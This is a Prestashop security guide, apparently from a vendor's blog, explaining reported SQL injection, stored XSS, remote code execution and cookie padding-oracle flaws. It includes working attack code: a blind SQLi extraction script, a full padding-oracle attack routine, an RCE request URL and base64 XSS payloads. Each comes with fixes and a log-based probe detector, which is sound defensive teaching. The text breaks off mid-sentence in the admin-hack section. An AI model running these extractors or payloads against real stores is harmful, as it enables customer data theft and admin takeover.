Channel: CodeSection (Code Section), Cyber Security - CodeSec

A Complete Guide on Prestashop Security.


E-commerce has gained momentum in the last few years, and open-source platforms such as Magento, OpenCart and Prestashop have sprung up to serve it. Prestashop in particular has gained popularity worldwide thanks to its open-source nature. But, as with any online store, security is the top priority for its customers, and several Prestashop security issues have been disclosed in recent years. As the book PrestaShop Module Development puts it,

When you install, configure, or improve a PrestaShop webshop, you won't code all your modules. You will probably buy modules or download free ones. In all cases, it's always good to read the code of these modules. However, beware―there are a hundred ways to obfuscate this kind of malicious code.

Contents of This Guide

1 Prestashop Security: Common Hacks in Prestashop
1.1 SQL Injection in Prestashop
1.2 Cross-site Scripting in Prestashop
1.3 Remote Code Execution in Prestashop
1.4 Privilege Escalation in Prestashop
1.5 Prestashop Redirect Hack
1.6 Admin Hack in Prestashop
1.7 Google Keyword Hack in Prestashop
1.8 Credit Card Hack in Prestashop
2.3 DNS Misconfiguration
2.4 Outdated Modules
3 Best Security Practices for Prestashop
3.2 Strong Credentials
3.5 Prestashop Security Modules
3.6 Updates and Backup
4 Prestashop Firewall and Antivirus
5 Prestashop Security Audit

Prestashop Security: Common Hacks in Prestashop

Setting up a Prestashop store is easy, but keeping it secure takes care. An online store may handle sensitive information such as credit card details, and protecting that data is a serious responsibility for the business. Attackers are constantly at work to steal it and sell it on Tor marketplaces for next to nothing. To understand how to keep a Prestashop store secure, let's first look at the ways Prestashop security gets exploited.

SQL Injection in Prestashop

An SQL injection (SQLi) vulnerability was disclosed in Prestashop, caused by a lack of input sanitization in one of its modules, Responsive Mega Menu (Horizontal+Vertical+Dropdown). SQL could be injected through function calls passed in the code parameter; the issue was assigned CVE-2018-8824. Before this, the id_manufacturer parameter was found to be vulnerable to a blind SQLi, reachable through a URL of the form http://example.com/ajax/getSimilarManufacturer.php?id_manufacturer=3[SQL-injection]. By exploiting an SQLi, an attacker can:

Read contents from the database.
Find out user login details (including the admin's) and then log in as admin.
Steal customer credit card information, if it is stored locally.
Pivot to further attacks using the sensitive information obtained from the database.
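As an added illustration (not code from this article or from Prestashop), the following Python script models the blind SQLi described above against a constructed in-memory SQLite database. The table and column names (ps_manufacturer, ps_employee.passwd), the admin row and the hash value are made up for the demo, and the real endpoint's query is not reproduced. It shows how a single yes/no signal (does manufacturer 3 still appear in the response?) is enough to leak the admin password hash one character at a time, and how casting the id to an integer and binding it as a parameter closes the hole.

```python
import sqlite3

# Constructed stand-in for the store database (table and column names, the
# admin row and the hash value are made up for this demo).
def build_demo_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE ps_manufacturer (id_manufacturer INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO ps_manufacturer VALUES (1, 'Acme'), (2, 'Globex'), (3, 'Initech');
        CREATE TABLE ps_employee (id_employee INTEGER PRIMARY KEY, email TEXT, passwd TEXT);
        INSERT INTO ps_employee VALUES (1, 'admin@example.com', 'a1b2c3');
    """)
    return db

def get_similar_manufacturer_vulnerable(db, id_manufacturer):
    """Builds the query by string concatenation, the way a vulnerable module does."""
    sql = "SELECT name FROM ps_manufacturer WHERE id_manufacturer = " + id_manufacturer
    return [row[0] for row in db.execute(sql)]

def get_similar_manufacturer_fixed(db, id_manufacturer):
    """Casts to int and binds the value, so it can never become part of the SQL text."""
    sql = "SELECT name FROM ps_manufacturer WHERE id_manufacturer = ?"
    return [row[0] for row in db.execute(sql, (int(id_manufacturer),))]

def blind_extract(oracle, column, table, charset="0123456789abcdef", max_len=64):
    """Boolean-based blind SQLi: recover `column` from `table` one character at a
    time. `oracle(payload)` must answer True when the page behaves as it does for
    a plain id (manufacturer 3 is listed) and False otherwise."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            cond = f"SUBSTR((SELECT {column} FROM {table} LIMIT 1), {pos}, 1) = '{ch}'"
            if oracle(f"3 AND {cond}"):
                recovered += ch
                break
        else:
            return recovered        # no character matched: end of the value
    return recovered

def demo():
    db = build_demo_db()
    oracle = lambda payload: get_similar_manufacturer_vulnerable(db, payload) == ["Initech"]
    leaked = blind_extract(oracle, "passwd", "ps_employee")
    try:                            # the fixed endpoint refuses the same payload
        get_similar_manufacturer_fixed(db, "3 AND 1=1")
        rejected = False
    except ValueError:
        rejected = True
    return leaked, rejected
```

In a PHP module the equivalent fix is to cast numeric input, `(int)Tools::getValue('id_manufacturer')`, and to pass strings through `pSQL()`; either way the request value never becomes part of the SQL text.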

Prestashop Security compromised? Drop us a message on the chat widget and we’d be happy to assist you with your Prestashop website. Secure your Prestashop website now .

Cross-site Scripting in Prestashop

Multiple XSS flaws have been found in Prestashop, including one this year (2018): CVE-2018-5681, discovered at the beginning of the year. That one, however, required the attacker to be logged in before it could be exploited. A more severe XSS vulnerability was found in the Contact Form module. It was more severe because it was persistent (stored): the isCleanHtml() filter could be bypassed by base64-encoding the payload. The same trick could be used to inject HTML and so alter how messages are displayed.

[Image: the base64-encoded inputs submitted through the Contact Form]

The input shown in the image is base64-encoded; both payloads decode to <script>alert()</script>. Since every message sent through the Contact Form is shown to the admin after logging in, an attacker can:

First inject the malicious code into a message.
Load admin cookie-stealing scripts from a malicious domain.
With the stolen cookie, log in as admin, which opens the site to all kinds of further attacks.
Hook the admin's browser and launch browser exploits.
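To make the filter bypass concrete, here is an added Python illustration (not the article's or Prestashop's code). The denylist regex is a simplified stand-in for a tag filter, not Prestashop's isCleanHtml(), and the decoding step is an assumption standing in for whatever turned the base64 text back into markup in the real case. The point it demonstrates holds regardless: a check run on the raw submitted string passes the base64 form of <script>alert()</script> untouched, while escaping at output time, in the HTML context where the message is rendered, neutralises the payload however it was encoded.

```python
import base64
import html
import re

# Simplified stand-in for a tag-denylist filter. It is NOT isCleanHtml(); it
# only shows why inspecting the raw string is not enough.
DENYLIST = re.compile(r"<\s*script|on\w+\s*=|javascript:", re.IGNORECASE)

def naive_is_clean(text):
    """Denylist check on the submitted text, exactly as received."""
    return DENYLIST.search(text) is None

def decode_if_base64(text):
    """Assumed consumer step: base64-decode input that decodes cleanly, else keep it."""
    try:
        return base64.b64decode(text, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return text

def render_message_unsafe(stored):
    """Admin view that trusts the stored message (the vulnerable pattern)."""
    return f"<div class='message'>{decode_if_base64(stored)}</div>"

def render_message_safe(stored):
    """Escape at output time, after any decoding, so markup cannot execute."""
    return f"<div class='message'>{html.escape(decode_if_base64(stored))}</div>"

# Constructed payload: the base64 form of <script>alert()</script>.
PAYLOAD = base64.b64encode(b"<script>alert()</script>").decode()

def demo():
    """Returns (filter passed?, unsafe view contains script?, safe view contains script?)."""
    return (
        naive_is_clean(PAYLOAD),
        "<script>" in render_message_unsafe(PAYLOAD),
        "<script>" in render_message_safe(PAYLOAD),
    )
```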

Remote Code Execution in Prestashop

Prestashop suffered from an RCE vulnerability this year (2018), again in the Responsive Mega Menu Pro module. The reported URL is http:///modules/bamegamenu/ajax_phpcode.php?code=echo exec(id); and the issue was assigned CVE-2018-8823. The code parameter was executed as PHP, so an attacker could run arbitrary PHP code on the server. Using this the attacker could:

Run PHP commands on the server.
Read or modify sensitive files.
Try to escalate privileges and then execute commands as an admin, completing the system takeover.
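Because both module issues are exploited through a single GET request, a check over the web server's access log catches probes cheaply. This added Python example (not from the article) parses constructed Apache combined-log lines and flags requests to ajax_phpcode.php that carry a code parameter, as well as id_manufacturer values that are not purely numeric. The log lines, IP addresses and rule names are made up for the demo; the endpoints and parameter names are the ones reported above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log lines (not real traffic); the first two are
# probes against the endpoints reported above, the third is a normal request.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Aug/2018:10:01:02 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=echo%20exec(id); HTTP/1.1" 200 512 "-" "curl/7.58.0"
198.51.100.7 - - [10/Aug/2018:10:01:05 +0000] "GET /ajax/getSimilarManufacturer.php?id_manufacturer=3%20AND%201=1 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Aug/2018:10:01:09 +0000] "GET /ajax/getSimilarManufacturer.php?id_manufacturer=3 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def parse_line(line):
    """Split one combined-log line into ip, timestamp, method, path and decoded params."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    return rec

def classify(rec):
    """Return (rule, detail) findings for one parsed request."""
    findings = []
    if rec["path"].endswith("/modules/bamegamenu/ajax_phpcode.php") and "code" in rec["params"]:
        findings.append(("bamegamenu-rce-probe", rec["params"]["code"][0]))
    for value in rec["params"].get("id_manufacturer", []):
        if not re.fullmatch(r"\d+", value):      # anything but a plain id is a probe
            findings.append(("id_manufacturer-sqli-probe", value))
    return findings

def scan(log_text):
    """Run every line through the rules and collect alerts."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for rule, detail in classify(rec):
            alerts.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                           "rule": rule, "detail": detail})
    return alerts
```

The id_manufacturer rule is deliberately strict: a numeric id is the only legitimate shape for that parameter, so rejecting everything else avoids having to enumerate injection syntax.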

Privilege Escalation in Prestashop

Prestashop suffered from a privilege escalation issue, CVE-2018-13784, caused by mishandling of cookie encryption. Prestashop encrypted cookies with Blowfish in ECB mode or AES in CBC mode with no integrity check, which left the cookie open to padding-oracle attacks. An attacker could alter the contents of a cookie to gain admin privileges and so access resources not intended for them. Exploiting this, the attacker can:

Take over any customer's session.
Steal sensitive information such as customer data, orders and credit card details.
Obtain access to the admin dashboard through CSRF or other attacks.
Potentially escalate to remote code execution.
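The following added Python example (not the article's or Prestashop's code) shows why encryption alone does not protect a cookie. It models an IV-prefixed CBC-mode cookie with PKCS#7 padding; because AES is not in the Python standard library, a small Feistel construction stands in for the block cipher (an assumption, and not secure in itself). An oracle that only answers "valid padding or not" is enough to recover the whole cookie without ever knowing the key; appending an HMAC that is verified before decryption removes that oracle, since every modified cookie is rejected the same way. The cookie contents and keys are constructed for the demo.

```python
import hashlib
import hmac
import os

BLOCK = 16

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round_fn(key, half, rnd):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, block):
    """Toy 4-round Feistel cipher standing in for AES (assumption; NOT secure)."""
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _round_fn(key, right, rnd))
    return left + right

def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round_fn(key, left, rnd)), left
    return left + right

def pad(data):                          # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # this distinguishable error is the oracle
    return data[:-n]

def cbc_encrypt(key, plaintext, iv=None):
    prev = iv or os.urandom(BLOCK)
    out, padded = [prev], pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)                # IV || C1 || C2 ...

def cbc_decrypt(key, data):
    if len(data) % BLOCK or len(data) < 2 * BLOCK:
        raise ValueError("bad length")
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    return unpad(b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:])))

def padding_oracle_attack(oracle, ciphertext):
    """Recover the plaintext of an IV-prefixed CBC ciphertext from a yes/no padding
    oracle alone; the key is never needed."""
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    recovered = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)        # block_decrypt(key, cur), learnt byte by byte
        for pos in range(BLOCK - 1, -1, -1):
            padv = BLOCK - pos
            forged = bytearray(BLOCK)
            for k in range(pos + 1, BLOCK):
                forged[k] = inter[k] ^ padv   # force the known tail to decrypt to padv
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged) + cur):
                    continue
                if pos == BLOCK - 1:    # rule out an accidental 02 02 / 03 03 03 match
                    forged[pos - 1] ^= 0xFF
                    still_valid = oracle(bytes(forged) + cur)
                    forged[pos - 1] ^= 0xFF
                    if not still_valid:
                        continue
                inter[pos] = guess ^ padv
                break
        recovered += _xor(inter, prev)  # plaintext block = intermediate XOR previous block
    return unpad(recovered)

def seal_cookie(enc_key, mac_key, value):
    """Encrypt-then-MAC: the tag covers the IV and the whole ciphertext."""
    ct = cbc_encrypt(enc_key, value)
    return ct + hmac.new(mac_key, ct, hashlib.sha256).digest()

def open_cookie(enc_key, mac_key, blob):
    ct, tag = blob[:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, ct, hashlib.sha256).digest()):
        raise ValueError("cookie tampered")  # rejected before any padding check runs
    return cbc_decrypt(enc_key, ct)

def demo():
    enc_key, mac_key = os.urandom(32), os.urandom(32)
    cookie = b"id_customer=42|id_employee=0"  # constructed cookie contents
    def oracle(data):                   # unauthenticated cookie: padding errors leak out
        try:
            cbc_decrypt(enc_key, data)
            return True
        except ValueError:
            return False
    leaked = padding_oracle_attack(oracle, cbc_encrypt(enc_key, cookie))
    sealed = seal_cookie(enc_key, mac_key, cookie)
    tampered = sealed[:-33] + bytes([sealed[-33] ^ 1]) + sealed[-32:]  # flip one ciphertext bit
    try:                                # authenticated cookie: forgery rejected, no oracle
        open_cookie(enc_key, mac_key, tampered)
        rejected = False
    except ValueError:
        rejected = True
    return leaked, rejected
```

The general fix is authenticated encryption: either encrypt-then-MAC as above, with the tag checked in constant time before the ciphertext is touched, or an AEAD mode such as AES-GCM, which does the same in one primitive.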

Prestashop Redirect Hack

Malicious actors often inject redirect JavaScript into the store. Customers who visit the site are then redirected, typically to adult sites, though sometimes to other sites selling products or simply to pages that harvest clicks for the attacker. Small stores are hit hardest. A Prestashop redirect hack can:

Get the store blacklisted by search engines.
Redirect up to 90 percent of user traffic.
Cost the store its users' trust.
Reduce sales because of the redirect malware.
Turn the Prestashop store into a spam garage.

Admin Hack in Prestashop

The Prestashop dashboard is often hacked because of lapses in Prestashop security. The admin panel is one of the most sensitive areas of the store: its location should not be exposed on the internet and it must be protected by a strong password. When it is compromised, it can lead to:

Creating multi
